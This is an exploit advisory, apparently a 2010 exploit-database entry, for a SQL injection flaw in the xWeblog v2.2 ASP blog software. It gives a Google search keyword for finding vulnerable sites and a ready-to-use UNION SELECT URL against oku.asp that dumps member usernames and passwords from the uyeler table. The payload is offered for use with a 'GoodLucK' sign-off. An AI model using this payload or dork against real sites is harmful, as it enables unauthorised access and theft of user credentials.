28 lines
No EOL
827 B
Text
28 lines
No EOL
827 B
Text
===================================================
|
|
xWeblog v2.2 - Remote SQL Injection Vulnerability (tr)
|
|
===================================================
|
|
|
|
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
[+] Author : KnocKout
|
|
[~] Contact : knockoutr@msn.com
|
|
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
~Web App. : xWeblog v2.2
|
|
~Software: http://www.aspdunyasi.com/goster.asp?id=19
|
|
~Vulnerability Style : (SQLi)
|
|
~Google Keywords : "XWEBLOG"
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
~~~~~~~~ Explotation ~~~~~~~~~~~
|
|
|
|
SQL Injection
|
|
================================
|
|
http://TARGET/path/oku.asp?makale_id=-67%20UNION%20SELECT+0,AD,SIFRE,3,4,5,6,7,8,9,10,11,12%20from%20uyeler
|
|
================================
|
|
[+] SQL Injected!
|
|
|
|
|
|
|
|
GoodLucK ;)
|
|
|
|
|
|
# Inj3ct0r.com [2010-09-28] |